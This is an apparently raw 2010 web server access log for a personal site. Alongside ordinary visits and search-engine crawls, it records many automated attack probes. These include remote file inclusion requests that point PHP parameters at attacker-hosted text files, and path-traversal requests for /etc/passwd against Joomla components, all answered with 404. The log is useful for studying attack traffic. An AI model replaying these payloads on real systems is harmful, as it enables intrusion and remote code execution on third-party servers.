207.46.199.43 - - [25/Apr/2010:03:54:54 -0500] "GET /logs/access_log.1167523200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.6.154.57 - - [25/Apr/2010:03:55:00 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
200.6.154.57 - - [25/Apr/2010:03:55:00 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.6.154.57 - - [25/Apr/2010:03:55:00 -0500] "GET /logs/access_log.1219708800%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
222.231.60.209 - - [25/Apr/2010:03:55:55 -0500] "GET /logs//main.php?sayfa=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.231.60.209 - - [25/Apr/2010:03:55:55 -0500] "GET /logs/access_log.1219363200%20%20//main.php?sayfa=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
222.231.60.209 - - [25/Apr/2010:03:55:55 -0500] "GET //main.php?sayfa=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
83.148.64.145 - - [25/Apr/2010:03:56:18 -0500] "GET /logs/access_log.1268956800//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??%20? HTTP/1.1" 404 372 "-""Mozilla/5.0"
83.148.64.145 - - [25/Apr/2010:03:56:24 -0500] "GET /logs/access_log.1268956800//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??%20? HTTP/1.1" 404 372 "-""Mozilla/5.0"
83.148.64.145 - - [25/Apr/2010:03:56:30 -0500] "GET /logs/access_log.1268956800//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??%20? HTTP/1.1" 404 372 "-""Mozilla/5.0"
83.148.64.145 - - [25/Apr/2010:03:56:33 -0500] "GET /logs/access_log.1268956800//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??%20? HTTP/1.1" 404 372 "-""Mozilla/5.0"
83.148.64.145 - - [25/Apr/2010:03:56:58 -0500] "GET /logs/access_log.1270684800//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??%20? HTTP/1.1" 404 372 "-""Mozilla/5.0"
83.148.64.145 - - [25/Apr/2010:03:57:04 -0500] "GET /logs/access_log.1270684800//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??%20? HTTP/1.1" 404 372 "-""Mozilla/5.0"
83.148.64.145 - - [25/Apr/2010:03:57:08 -0500] "GET /logs/access_log.1270684800//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??%20? HTTP/1.1" 404 372 "-""Mozilla/5.0"
83.148.64.145 - - [25/Apr/2010:03:57:14 -0500] "GET /logs/access_log.1270684800//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??%20? HTTP/1.1" 404 372 "-""Mozilla/5.0"
87.106.42.197 - - [25/Apr/2010:03:59:51 -0500] "GET /logs/access_log.1219708800/index.php?option=com_letterman&Itemid=&mosConfig.absolute.path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
87.106.42.197 - - [25/Apr/2010:03:59:51 -0500] "GET /index.php?option=com_letterman&Itemid=&mosConfig.absolute.path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.106.42.197 - - [25/Apr/2010:03:59:51 -0500] "GET /logs/index.php?option=com_letterman&Itemid=&mosConfig.absolute.path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
87.106.42.197 - - [25/Apr/2010:04:00:34 -0500] "GET /logs/access_log.1220054400/index.php?option=com_letterman&Itemid=&mosConfig.absolute.path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.46.195.239 - - [25/Apr/2010:04:02:55 -0500] "GET /logs/access_log.1214870400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
86.80.242.57 - - [25/Apr/2010:04:03:22 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.nl/search?q=bert+grimm+flash&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:nl:official&client=firefox-a""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; nl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
86.80.242.57 - - [25/Apr/2010:04:03:22 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; nl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
86.80.242.57 - - [25/Apr/2010:04:03:25 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; nl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
86.80.242.57 - - [25/Apr/2010:04:03:26 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; nl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
86.80.242.57 - - [25/Apr/2010:04:03:26 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; nl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
86.80.242.57 - - [25/Apr/2010:04:03:26 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; nl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
86.80.242.57 - - [25/Apr/2010:04:03:26 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; nl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
86.80.242.57 - - [25/Apr/2010:04:03:26 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; nl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
86.80.242.57 - - [25/Apr/2010:04:03:26 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; nl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
86.80.242.57 - - [25/Apr/2010:04:03:26 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; nl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
86.80.242.57 - - [25/Apr/2010:04:03:26 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; nl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
86.80.242.57 - - [25/Apr/2010:04:03:26 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; nl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
86.80.242.57 - - [25/Apr/2010:04:03:26 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; nl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
86.80.242.57 - - [25/Apr/2010:04:03:27 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; nl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
86.80.242.57 - - [25/Apr/2010:04:03:27 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; nl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
86.80.242.57 - - [25/Apr/2010:04:03:41 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; nl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
86.80.242.57 - - [25/Apr/2010:04:05:06 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; nl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
86.80.242.57 - - [25/Apr/2010:04:05:06 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; nl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
86.80.242.57 - - [25/Apr/2010:04:05:06 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; nl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
86.80.242.57 - - [25/Apr/2010:04:05:06 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; nl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
207.46.13.89 - - [25/Apr/2010:04:10:25 -0500] "GET /logs/access_log.1254009600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.113.99.70 - - [25/Apr/2010:04:10:26 -0500] "GET /logs/access_log.1213660800/includes/ktedit/toolbar.php?dirDepth=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
66.113.99.70 - - [25/Apr/2010:04:10:26 -0500] "GET /logs/access_log.1223164800/includes/ktedit/toolbar.php?dirDepth=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
87.106.42.197 - - [25/Apr/2010:04:11:04 -0500] "GET /logs/access_log.1236297600/index.php?option=com_letterman&Itemid=&mosConfig.absolute.path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.46.204.191 - - [25/Apr/2010:04:12:24 -0500] "GET /logs/access_log.1173916800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.160.224.208 - - [25/Apr/2010:04:12:48 -0500] "GET /logs/access_log.1219708800///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
122.199.140.158 - - [25/Apr/2010:04:12:50 -0500] "GET /logs/access_log.1265760000//include/bbs.lib.inc.php?site_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.199.140.158 - - [25/Apr/2010:04:12:50 -0500] "GET //include/bbs.lib.inc.php?site_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
122.199.140.158 - - [25/Apr/2010:04:12:50 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
122.199.140.158 - - [25/Apr/2010:04:12:56 -0500] "GET /logs/access_log.1266105600//include/bbs.lib.inc.php?site_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
195.160.224.208 - - [25/Apr/2010:04:12:58 -0500] "GET ///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
195.160.224.208 - - [25/Apr/2010:04:13:04 -0500] "GET /logs///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
174.121.83.94 - - [25/Apr/2010:04:13:06 -0500] "GET /logs/access_log.1213660800/includes/ktedit/toolbar.php?dirDepth=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
174.121.83.94 - - [25/Apr/2010:04:13:07 -0500] "GET /logs/access_log.1223164800/includes/ktedit/toolbar.php?dirDepth=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
207.46.13.138 - - [25/Apr/2010:04:14:55 -0500] "GET /logs/access_log.1190678400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.84 - - [25/Apr/2010:04:22:55 -0500] "GET /logs/access_log.1245974400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.144 - - [25/Apr/2010:04:24:55 -0500] "GET /logs/access_log.1251072000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
118.217.216.132 - - [25/Apr/2010:04:25:28 -0500] "GET /errors.php?error=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
118.217.216.132 - - [25/Apr/2010:04:25:29 -0500] "GET /logs/errors.php?error=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
118.217.216.132 - - [25/Apr/2010:04:25:30 -0500] "GET /logs/access_log.1219363200%20%20/errors.php?error=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
118.217.216.132 - - [25/Apr/2010:04:26:20 -0500] "GET /errors.php?error=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
118.217.216.132 - - [25/Apr/2010:04:26:21 -0500] "GET /logs/errors.php?error=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
118.217.216.132 - - [25/Apr/2010:04:26:22 -0500] "GET /logs/access_log.1219363200%20%20/errors.php?error=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.195.112.180 - - [25/Apr/2010:04:29:13 -0500] "GET /logs/access_log.1232841600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.51 - - [25/Apr/2010:04:31:55 -0500] "GET /logs/access_log.1161820800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.252.224.4 - - [25/Apr/2010:04:35:01 -0500] "GET /logs/access_log.1262563200/blend_data/blend_common.php?phpbb_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
66.252.224.4 - - [25/Apr/2010:04:35:01 -0500] "GET /logs/access_log.1262822400/blend_data/blend_common.php?phpbb_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
66.252.224.4 - - [25/Apr/2010:04:35:01 -0500] "GET /blend_data/blend_common.php?phpbb_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
66.252.224.4 - - [25/Apr/2010:04:35:01 -0500] "GET /logs/blend_data/blend_common.php?phpbb_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
66.221.63.33 - - [25/Apr/2010:04:35:18 -0500] "GET /blend_data/blend_common.php?phpbb_root_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 299 "-""Mozilla/5.0"
66.221.63.33 - - [25/Apr/2010:04:35:18 -0500] "GET /logs/blend_data/blend_common.php?phpbb_root_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 304 "-""Mozilla/5.0"
66.221.63.33 - - [25/Apr/2010:04:35:18 -0500] "GET /logs/access_log.1262563200/blend_data/blend_common.php?phpbb_root_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 326 "-""Mozilla/5.0"
66.221.63.33 - - [25/Apr/2010:04:35:18 -0500] "GET /logs/access_log.1262822400/blend_data/blend_common.php?phpbb_root_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 326 "-""Mozilla/5.0"
66.221.63.33 - - [25/Apr/2010:04:35:27 -0500] "GET /blend_data/blend_common.php?phpbb_root_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 299 "-""Mozilla/5.0"
66.221.63.33 - - [25/Apr/2010:04:35:27 -0500] "GET /logs/blend_data/blend_common.php?phpbb_root_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 304 "-""Mozilla/5.0"
66.221.63.33 - - [25/Apr/2010:04:35:27 -0500] "GET /logs/access_log.1262563200/blend_data/blend_common.php?phpbb_root_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 326 "-""Mozilla/5.0"
66.221.63.33 - - [25/Apr/2010:04:35:32 -0500] "GET /logs/access_log.1262822400/blend_data/blend_common.php?phpbb_root_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 326 "-""Mozilla/5.0"
200.6.154.57 - - [25/Apr/2010:04:35:51 -0500] "GET /logs/access_log.1219708800/includes/ktedit/toolbar.php?dirDepth=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
200.6.154.57 - - [25/Apr/2010:04:36:27 -0500] "GET /logs/access_log.1219708800/includes/ktedit/toolbar.php?dirDepth=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
66.249.71.36 - - [25/Apr/2010:04:39:57 -0500] "GET /costume/034_JPG%20copy.jpg HTTP/1.1" 200 43973 "-""Googlebot-Image/1.0"
195.160.224.208 - - [25/Apr/2010:04:43:14 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.160.224.208 - - [25/Apr/2010:04:43:20 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
195.160.224.208 - - [25/Apr/2010:04:43:25 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
74.204.169.136 - - [25/Apr/2010:04:43:33 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
195.216.234.1 - - [25/Apr/2010:04:43:40 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
204.14.3.162 - - [25/Apr/2010:04:43:45 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
72.52.203.55 - - [25/Apr/2010:04:43:48 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
69.57.164.32 - - [25/Apr/2010:04:43:55 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
118.217.216.132 - - [25/Apr/2010:04:44:02 -0500] "GET //main.php?sayfa=http://bboards.co.nz////data/file//music_skin//thumb/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
118.217.216.132 - - [25/Apr/2010:04:44:03 -0500] "GET /logs//main.php?sayfa=http://bboards.co.nz////data/file//music_skin//thumb/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
118.217.216.132 - - [25/Apr/2010:04:44:04 -0500] "GET /logs/access_log.1219363200%20%20//main.php?sayfa=http://bboards.co.nz////data/file//music_skin//thumb/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
195.216.234.1 - - [25/Apr/2010:04:44:16 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
195.216.234.1 - - [25/Apr/2010:04:44:16 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
195.216.234.1 - - [25/Apr/2010:04:44:16 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
74.204.169.136 - - [25/Apr/2010:04:44:30 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
74.204.169.136 - - [25/Apr/2010:04:44:30 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
74.204.169.136 - - [25/Apr/2010:04:44:30 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
72.52.203.55 - - [25/Apr/2010:04:44:50 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
72.52.203.55 - - [25/Apr/2010:04:44:50 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
72.52.203.55 - - [25/Apr/2010:04:44:50 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
204.14.3.162 - - [25/Apr/2010:04:44:58 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
204.14.3.162 - - [25/Apr/2010:04:44:58 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
204.14.3.162 - - [25/Apr/2010:04:44:58 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
69.57.164.32 - - [25/Apr/2010:04:45:17 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
69.57.164.32 - - [25/Apr/2010:04:45:17 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
69.57.164.32 - - [25/Apr/2010:04:45:17 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
204.14.3.162 - - [25/Apr/2010:04:47:16 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
204.14.3.162 - - [25/Apr/2010:04:47:16 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
204.14.3.162 - - [25/Apr/2010:04:47:16 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
74.204.169.136 - - [25/Apr/2010:04:48:38 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
74.204.169.136 - - [25/Apr/2010:04:48:38 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
74.204.169.136 - - [25/Apr/2010:04:48:38 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
